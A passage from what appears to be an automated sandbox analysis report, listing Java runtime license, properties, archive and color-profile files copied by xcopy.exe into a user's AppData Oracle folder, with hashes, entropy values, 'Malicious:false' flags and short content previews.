                                                                                                                                                                                                                                  SHA-512:4A98ACC829DC48E185FE418A7DDE6A51C497C343E2C36A2F5CADE2BF7C0DE4AAC8BA8C0F08843BFDEEA23DA72D3FE09EFE877E68F890174F1DFF44B0D143D7B2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## RelaxNG Datatype v1.0..### RelaxNG Datatype License.```..Copyright (c) 2005, 2010 Thai Open Source Software Center Ltd.All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are.met:.. Redistributions of source code must retain the above copyright. notice, this list of conditions and the following disclaimer... Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in. the documentation and/or other materials provided with the. distribution... Neither the names of the copyright holders nor the names of its. contributors may be used to endorse or promote products derived. from this software without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS."AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.LIMITED TO, THE IMPLI

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\relaxngom.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1168
                                                                                                                                                                                                                                  Entropy (8bit):5.234479012488585
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:jcrmJHHH0yN3gtsaLhP9QHOsUv4eOk4/+/m3oqLFj:4aJHlxE3fQHOs5exm3ogFj
                                                                                                                                                                                                                                  MD5:F566A60D7E2A16EBF1C9D8938635C269
                                                                                                                                                                                                                                  SHA1:5B796B99C8060C4E4AD467A83C859C458A27EA3B
                                                                                                                                                                                                                                  SHA-256:075A8114166C0875C6625312758040FC4514B3893F185452BC73EF5321875947
                                                                                                                                                                                                                                  SHA-512:29118160766447EF8732B9EBE65E1F67F6C7544FCF26A110A967281F0C6DD8FC7858C77B639DA5DFE96D502BA16C03D9710FFE95847150977F393AC77DC8B422
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## RelaxNG Object Model/Parser (RNGOM.jar) v20050510..### RelaxNG Object Model/Parser License.```.Copyright (C) Kohsuke Kawaguchi 2004-2011..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions: The above copyright.notice and this permission notice shall be included in all copies or.substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIA

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\santuario.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11960
                                                                                                                                                                                                                                  Entropy (8bit):4.59509416012808
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:0N53HFEASdeYFPVRQUM9o1XDFMKdFSvJZN+0G04Hrc3Pv8KIHKxF9Nmu3Dzt1Xk9:q5ixNRrM21TiA+8VL+EKdXNt9xkTYE39
                                                                                                                                                                                                                                  MD5:F15C745FECDC2E5BC33007FD128CB9DA
                                                                                                                                                                                                                                  SHA1:D5710174E8F41EB65922C3A50EF28AB08820DA02
                                                                                                                                                                                                                                  SHA-256:1C7C9A2635248563AC5F466E1B67B6E074CF80532FA754E30F0F9FADB1569EAB
                                                                                                                                                                                                                                  SHA-512:15DA2AF50CD4D20B612E32A046A41396DE6881631D6786CEE40775DC5FE889B32F5981215AAD36BC3553A8CE807F7912255D4ADBD26BEF558B4583694342DAC1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Apache Santuario XML Security for Java v2.3.0..### Apache Santuario Notice.```..Apache Santuario - XML Security for Java.Copyright 1999-2021 The Apache Software Foundation..This product includes software developed at.The Apache Software Foundation (http://www.apache.org/)...It was originally based on software copyright (c) 2001, Institute for.Data Communications Systems, <http://www.nue.et-inf.uni-siegen.de/>...The development of this software was partly funded by the European .Commission in the <WebSig> project in the ISIS Programme...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the speci

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\thaidict.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1341
                                                                                                                                                                                                                                  Entropy (8bit):5.134396092780326
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:jLrwAkIL2LjjWrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFj:fEAk+2LnWaJHlxE3dQHOs5exm3ogFj
                                                                                                                                                                                                                                  MD5:38E321EF31B7429D8A717525CC85CA8E
                                                                                                                                                                                                                                  SHA1:80B2B391C1FF687D693218D72ACA31C190B4FDAD
                                                                                                                                                                                                                                  SHA-256:B9B6B1D88C6FCD67DC6D5869731A4A29ED7CFDD0D3503FD7216924A9C007070D
                                                                                                                                                                                                                                  SHA-512:17F701624384E9F276D0CB5083AC04AFFD348651278F9F9D65C8D84ACCAA9A6E2B56318B633FD496632E5AAF0F87E725F07AD827498723D87F8E3AFCE6DC9AEE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Thai Dictionary..### Thai Dictionary License.```..Copyright (C) 1982 The Royal Institute, Thai Royal Government...Copyright (C) 1998 National Electronics and Computer Technology Center,.National Science and Technology Development Agency,.Ministry of Science Technology and Environment,.Thai Royal Government...Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTI

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\unicode.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2398
                                                                                                                                                                                                                                  Entropy (8bit):5.11945767410343
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:4gcg0AhuAYWFkXVJz4KMA5cyBlPhBmztuztw/qHasjIGBcBrIqptPrfEF0L:4nXAhwZnz4WzPSzUzqiHBc1jDPrfhL
                                                                                                                                                                                                                                  MD5:288EC55B4B45C6C13EB50B339D180CC8
                                                                                                                                                                                                                                  SHA1:8EABFCD5C0DE57F253A016618EBF3E02543C85DD
                                                                                                                                                                                                                                  SHA-256:90333C7083132BE31A9A29E3D64BB16C438204678152C40FF96B1508C168EE93
                                                                                                                                                                                                                                  SHA-512:9732852C7F069E6DDA5C58D2677F3A39E6F105DA0117C60C961DAA0A509EADBBBAA393F65D96CF8603ECDF8DA97954295721389F28A2E9CB0081A734B459B021
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Unicode Character Database v6.2 ..### Unicode Character Database..```. UNICODE, INC. LICENSE AGREEMENT - DATA FILES AND SOFTWARE.. See Terms of Use for definitions of Unicode Inc.'s. Data Files and Software... NOTICE TO USER: Carefully read the following legal agreement.. BY DOWNLOADING, INSTALLING, COPYING OR OTHERWISE USING UNICODE INC.'S. DATA FILES ("DATA FILES"), AND/OR SOFTWARE ("SOFTWARE"),. YOU UNEQUIVOCALLY ACCEPT, AND AGREE TO BE BOUND BY, ALL OF THE. TERMS AND CONDITIONS OF THIS AGREEMENT.. IF YOU DO NOT AGREE, DO NOT DOWNLOAD, INSTALL, COPY, DISTRIBUTE OR USE. THE DATA FILES OR SOFTWARE... COPYRIGHT AND PERMISSION NOTICE. Copyright . 1991-2019 Unicode, Inc. All rights reserved.. Distributed under the Terms of Use in https://www.unicode.org/copyright.html... Permission is hereby granted, free of charge, to any person obtaining. a copy of the Unicode data files and any associated documentation. (the "Data Files") or Unicode software and any associated documentation. (the

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\xalan.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12261
                                                                                                                                                                                                                                  Entropy (8bit):4.620411971571462
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:P2dz8wEASdeYFPVRQUM9o1XDFMKdFSvJZN+0G04Hrc3Pv8KIHKxF9Nmu3Dzt1Xk9:ulsxNRrM21TiA+8VL+EKdXNt9xkTYE39
                                                                                                                                                                                                                                  MD5:2C76AEEDC888F46A7ED9EB5FA6FB0E29
                                                                                                                                                                                                                                  SHA1:D07F52BEFDE05615A38CDE5947F0B4F09D57B5A9
                                                                                                                                                                                                                                  SHA-256:2C161F3E92ED1618D5758F9916DEBA2DF4E4D7E1AD1303A6C0D8210797B0EFAE
                                                                                                                                                                                                                                  SHA-512:A2A66767DBE2EC5B19D292F96F45D15F6DE0E78F474B4F5B2633CE03E0D504BAC13216FF91407F02B3BC7D913659E78F90F0903383059D718C9A18A896C47F9B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Apache Xalan v2.7.2..### Apache Xalan Notice.```.. ======================================================================================. == NOTICE file corresponding to the section 4d of the Apache License, Version 2.0, ==. == in this case for the Apache Xalan distribution. ==. ======================================================================================.. This product includes software developed by. The Apache Software Foundation (http://www.apache.org/)... Specifically, we only include the XSLTC portion of the source from the Xalan distribution. . The Xalan project has two processors: an interpretive one (Xalan Interpretive) and a . compiled one (The XSLT Compiler (XSLTC)). We *only* use the XSLTC part of Xalan; We use. the source from the packages that are part of the XSLTC sources... Portions of this software was originally based on the following:.. - software copyright (c) 1999-2002, Lotus Development Co

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\xerces.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11842
                                                                                                                                                                                                                                  Entropy (8bit):4.611715701079404
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ZNuXXEASdeYFPVRQUM9o1XDFMKdFSvJZN+0G04Hrc3Pv8KIHKxF9Nmu3Dzt1XkT5:ZgExNRrM21TiA+8VL+EKdXNt9xkTYE39
                                                                                                                                                                                                                                  MD5:E951EEF9E852F6CC58B0B8AE922B31DC
                                                                                                                                                                                                                                  SHA1:175CA0CBD66E5FB5A65499D7DD28184E828B347E
                                                                                                                                                                                                                                  SHA-256:A0237ECA7D0D59349878E4572F907DF093B81AEE16CDE1FBBB402276B4AD69CE
                                                                                                                                                                                                                                  SHA-512:2CE1FA80A39B50C99B10B7A46E703FDC1C20AC75E187B0729536A9FCAF1AA7DCD1C1021730205DE3F1137C68FC7CE73C0F6E869B97ADAB4391753076BA021497
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Apache Xerces v2.12.2..### Apache Xerces Notice.```. =========================================================================. == NOTICE file corresponding to section 4(d) of the Apache License, ==. == Version 2.0, in this case for the Apache Xerces Java distribution. ==. =========================================================================. . Apache Xerces Java. Copyright 1999-2022 The Apache Software Foundation.. This product includes software developed at. The Apache Software Foundation (http://www.apache.org/)... Portions of this software were originally based on the following:. - software copyright (c) 1999, IBM Corporation., http://www.ibm.com.. - software copyright (c) 1999, Sun Microsystems., http://www.sun.com.. - voluntary contributions made by Paul Eng on behalf of the. Apache Software Foundation that were originally developed at iClick, Inc.,. software copyright (c) 1999..```..### Apache 2.0 License.```..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\xmlresolver.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11350
                                                                                                                                                                                                                                  Entropy (8bit):4.573308481728409
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:0rFEASdeYFPVRQUM9o1XDFMKdFSvJZN+0G04Hrc3Pv8KIHKxF9Nmu3Dzt1XkTYs7:ESxNRrM21TiA+8VL+EKdXNt9xkTYE3N
                                                                                                                                                                                                                                  MD5:32AFC0BB251A45D500B1CA3E4F139868
                                                                                                                                                                                                                                  SHA1:53397311C094A4013D988D7691AF8EDED9E47EB5
                                                                                                                                                                                                                                  SHA-256:52F0F96EE75D0F48655C450D655F10CC90CA0502A862660DF048FD1DD9C02258
                                                                                                                                                                                                                                  SHA-512:23ED52B27F1B8429AB3CE71E0DB5A563837FA12FF3631272BE06B29A6825F0F72AF0281620063ECD0780997E6AC15F7081E19F5F2011041BEE5A9737C653F0E9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Apache XML Commons Resolver v1.2..### Apache XML Commons Resolver Notice..```..Apache XML Commons Resolver.Copyright 2006 The Apache Software Foundation...This product includes software developed at.The Apache Software Foundation http://www.apache.org/..Portions of this code are derived from classes placed in the.public domain by Arbortext on 10 Apr 2000. See:.http://www.arbortext.com/customer_support/updates_and_technical_notes/catalogs/docs/README.htm.```..### Apache 2.0 License.```.. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/..TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION..1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\zlib.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1011
                                                                                                                                                                                                                                  Entropy (8bit):4.588387206517629
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:jptxuyMlc/LxAbno0QNplTp4XGBi+g7Y8PaO:FJCc/LebnN63Tp4X4i/7ZSO
                                                                                                                                                                                                                                  MD5:440321D71D082C9F04A9995B613BDFF2
                                                                                                                                                                                                                                  SHA1:9AF688D499B3026EC8E5A2E266DC4B9B4884A87B
                                                                                                                                                                                                                                  SHA-256:81518EBC49D23A7C77B2E08EFF48664EA0C7DD90957A0CAF22FD9654985D3285
                                                                                                                                                                                                                                  SHA-512:C516403A109630B79998F3BEA6B698247A0B5367CC9873DEFA75014E8C98C690D34D0810D32792D80FDE1333980AC6C5F19324743795CB6455EF0EE4979496BB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## zlib v1.2.13..### zlib License.<pre>..Copyright (C) 1995-2022 Jean-loup Gailly and Mark Adler..This software is provided 'as-is', without any express or implied.warranty. In no event will the authors be held liable for any damages.arising from the use of this software...Permission is granted to anyone to use this software for any purpose,.including commercial applications, and to alter it and redistribute it.freely, subject to the following restrictions:..1. The origin of this software must not be misrepresented; you must not. claim that you wrote the original software. If you use this software. in a product, an acknowledgment in the product documentation would be. appreciated but is not required..2. Altered source versions must be plainly marked as such, and must not be. misrepresented as being the original software..3. This notice may not be removed or altered from any source distribution...Jean-loup Gailly Mark Adler.jloup@gzip.org madler@alumni.caltech.e

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\accessibility.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):149
                                                                                                                                                                                                                                  Entropy (8bit):4.558376029276625
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:LFpfBZgZLXnuWxVEzERMLVAAiuKIn7IRAdSPGGzJzGBXlnfMaAHCR1vn:L7APWzTLVAkIiSPhZGBX5kaAHCXn
                                                                                                                                                                                                                                  MD5:2ED483DF31645D3D00C625C00C1E5A14
                                                                                                                                                                                                                                  SHA1:27C9B302D2D47AAE04FC1F4EF9127A2835A77853
                                                                                                                                                                                                                                  SHA-256:68EF2F3C6D7636E39C6626ED1BD700E3A6B796C25A9E5FECA4533ABFACD61CDF
                                                                                                                                                                                                                                  SHA-512:4BF6D06F2CEAF070DF4BD734370DEF74A6DD545FD40EFD64A948E1422470EF39E37A4909FEEB8F0731D5BADB3DD9086E96DACE6BDCA7BBD3078E8383B16894DA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# Load the Java Access Bridge class into the JVM.#.#assistive_technologies=com.sun.java.accessibility.AccessBridge.#screen_magnifier_present=true..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\calendars.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1482
                                                                                                                                                                                                                                  Entropy (8bit):5.175972768583767
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:QVDBgkjOOVul8DbeQ1N3s5MCmCkcJF+DK+Obv:KqOVu2HX1C5MCmCkcJFvRL
                                                                                                                                                                                                                                  MD5:3F731B169E01A9EFE3E19A1F40679C9A
                                                                                                                                                                                                                                  SHA1:531A6316953FC152809601806FEC55E1BE806700
                                                                                                                                                                                                                                  SHA-256:1169FCBA1385B8E4BACCBD8156A43E3179C26E1877CC154BD16FF23874B208EA
                                                                                                                                                                                                                                  SHA-512:81C03E0B1CF93C873EA495CB6F434FA5FA41F02CFD7DC399E859C565E52E2E942E3ED04D4025F1E4F114DDB180503A5F97FF88FD4C41BB1C810AFB0F03B93EC6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Copyright (c) 2005, 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#..#.# Japanese imperial calendar.#.# Meiji since 1868-01-01 00:00:00 local time (Gregorian).# Taisho since 1912-07-30 00:00:00 local time (Gregorian).# Showa since 1926-12-25 00:00:00 local time (Gregorian).# Heisei since 1989-01-08 00:00:00 local time (Gregorian).# Reiwa since 2019-05-01 00:00:00 local time (Gregorian).calendar.japanese.type: LocalGregorianCalendar.calendar.japanese.eras: \..name=Meiji,abbr=M,since=-3218832000000; \..name=Taisho,abbr=T,since=-1812153600000; \..name=Showa,abbr=S,since=-1357603200000; \..name=Heisei,abbr=H,since=600220800000; \..name=Reiwa,abbr=R,since=1556668800000..#.# Taiwanese calendar.# Minguo since 1911-01-01 00:00:00 local time (Gregorian).calendar.taiwanese.type: LocalGregorianCalendar.calendar.taiwanese.eras: \..name=MinGuo,since=-1830384000

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\charsets.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3039864
                                                                                                                                                                                                                                  Entropy (8bit):6.6099327607002465
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:49152:sAirCz1nEJOOUJbcqt/S7+EXdnvv82lbIeo2S:sAimzNztfa3n3HlbIP
                                                                                                                                                                                                                                  MD5:D4435B45112F95A3C87472C8A46933F6
                                                                                                                                                                                                                                  SHA1:308703B9011FA68CC9D1A30EC74B1FC4895EE65B
                                                                                                                                                                                                                                  SHA-256:B20DDFD8D03D76915E3F43F462007E15C4BFE6A67AFE9A040AE8916696C19D5B
                                                                                                                                                                                                                                  SHA-512:6D9D5C8F68ACB92B1AA3E9F1A0ABE2D42823FC7DFE2C0673BDD2C59ACC638EF053536A567A2BFCE53A26ED6AD4FA39EF73C2F3512EB1DCF8FEE7B12204EC0513
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK.........p.V................META-INF/....PK.........p.V....E...E.......META-INF/MANIFEST.MFManifest-Version: 1.0..Created-By: 1.7.0_291 (Oracle Corporation)....PK.........n.V./..............sun/nio/cs/ext/Big5.class.......4....]..c..d............................................................................................................................................................................................................................................................................................................... !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~...........................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\classlist

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):84355
                                                                                                                                                                                                                                  Entropy (8bit):4.927199323446014
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:4X/nxfn5rxLyMznYolTzlff5OK3COHoHNG5rb/cxNwmCX1g86K2oWdAqNqc+KMjD:qxn5rxLyMzbf5OK3CJNG51g86A
                                                                                                                                                                                                                                  MD5:7FC71A62D85CCF12996680A4080AA44E
                                                                                                                                                                                                                                  SHA1:199DCCAA94E9129A3649A09F8667B552803E1D0E
                                                                                                                                                                                                                                  SHA-256:01FE24232D0DBEFE339F88C44A3FD3D99FF0E17AE03926CCF90B835332F5F89C
                                                                                                                                                                                                                                  SHA-512:B0B9B486223CF79CCF9346AAF5C1CA0F9588247A00C826AA9F3D366B7E2EF905AF4D179787DCB02B32870500FD63899538CF6FAFCDD9B573799B255F658CEB1D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:java/lang/Object..java/lang/String..java/io/Serializable..java/lang/Comparable..java/lang/CharSequence..java/lang/Class..java/lang/reflect/GenericDeclaration..java/lang/reflect/AnnotatedElement..java/lang/reflect/Type..java/lang/Cloneable..java/lang/ClassLoader..java/lang/System..java/lang/Throwable..java/lang/Error..java/lang/ThreadDeath..java/lang/Exception..java/lang/RuntimeException..java/lang/SecurityManager..java/security/ProtectionDomain..java/security/AccessControlContext..java/security/SecureClassLoader..java/lang/ClassNotFoundException..java/lang/ReflectiveOperationException..java/lang/NoClassDefFoundError..java/lang/LinkageError..java/lang/ClassCastException..java/lang/ArrayStoreException..java/lang/VirtualMachineError..java/lang/OutOfMemoryError..java/lang/StackOverflowError..java/lang/IllegalMonitorStateException..java/lang/ref/Reference..java/lang/ref/SoftReference..java/lang/ref/WeakReference..java/lang/ref/FinalReference..java/lang/ref/PhantomReference..sun/misc/Cleaner

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\cmm\CIEXYZ.pf

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Sun KCMS color profile 2.0, type KCMS, XYZ/XYZ-spac device, 51236 bytes, 2-12-1997 18:50:04, dependently, PCS X=0xf6b3 Z=0xd2f8 "XYZ to XYZ Identity Profile"
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):51236
                                                                                                                                                                                                                                  Entropy (8bit):7.226972359973779
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:2Qnt0y7xFNksbeCqY39JJ8GmaNo68GmaNo68GmaNoW:JOy7xXjtqYNfHxNo6HxNo6HxNoW
                                                                                                                                                                                                                                  MD5:10F23396E21454E6BDFB0DB2D124DB85
                                                                                                                                                                                                                                  SHA1:B7779924C70554647B87C2A86159CA7781E929F8
                                                                                                                                                                                                                                  SHA-256:207D748A76C10E5FA10EC7D0494E31AB72F2BACAB591371F2E9653961321FE9C
                                                                                                                                                                                                                                  SHA-512:F5C5F9FC3C4A940D684297493902FD46F6AA5248D2B74914CA5A688F0BAD682831F6060E2264326D2ECB1F3544831EB1FA029499D1500EA4BFE3B97567FE8444
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...$KCMS....spacXYZ XYZ .........2..acspSUNW....KODA.ODA............................................................................A2B0.......4B2A0.......4cprt.......Gwtpt...T....desc...h....K070........K071........mft2................................................................................................................ !!""##$$%%&&''(())**++,,--..//00112233445566778899::;;<<==>>??@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZ[[\\]]^^__``aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzz{{||}}~~.................................................................................................................................................................................................................................................................................................................................. !!""##$$%%&&''(())**++,,--..//00112233445566778899::;;<<==>>??@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZ[[\\]]^^__``aabbccddeeffgghhiijjkkllmm

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\cmm\GRAY.pf

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Sun KCMS color profile 2.0, type KCMS, GRAY/XYZ-mntr device, KODA/GRAY model, 632 bytes, 27-7-95 17:30:15, embedded, relative colorimetric, PCS Z=0xd32b "KODAK Grayscale Conversion - Gamma 1.0"
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):632
                                                                                                                                                                                                                                  Entropy (8bit):3.7843698642539243
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:51AP3fJgXQ531yqQac/lkgz42WlHlYujlOl9Fhl:vA2XQCqpUlkgzulHiXl3hl
                                                                                                                                                                                                                                  MD5:1002F18FC4916F83E0FC7E33DCC1FA09
                                                                                                                                                                                                                                  SHA1:27F93961D66B8230D0CDB8B166BC8B4153D5BC2D
                                                                                                                                                                                                                                  SHA-256:081CAAC386D968ADD4C2D722776E259380DCF78A306E14CC790B040AB876D424
                                                                                                                                                                                                                                  SHA-512:334D932D395B46DFC619576B391F2ADC2617E345AFF032B592C25E333E853735DA8B286EF7542EB19059CDE8215CDCEA147A3419ED56BDD6006CA9918D0618E1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...xKCMS....mntrGRAYXYZ ._..........acspSUNW....KODAGRAY.......................+....................................................cprt.......?desc........dmnd.......`wtpt........kTRC........dmdd.......dtext....COPYRIGHT (c) 1997 Eastman Kodak, All rights reserved...desc.......'KODAK Grayscale Conversion - Gamma 1.0..................@...............~.......................~.......~..............desc........KODAK..................@..................................................,...,....XYZ ...............+curv............desc........Grayscale..................@..................................................,...,....

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\cmm\LINEAR_RGB.pf

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:color profile 2.0, type KCMS, RGB/XYZ-mntr device by KODK, 1044 bytes, 2-2-1998, PCS Z=0xd32c "linear sRGB"
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1044
                                                                                                                                                                                                                                  Entropy (8bit):6.510788634170065
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:zwuau/7De0/q98EAsBIMD/WvaKIV4R0/lCAEdD0WlV9AEdwKKt/n3knR3lfR/NHD:zw7ePB/rEAsBIkVuUlAYKu/nUnKw
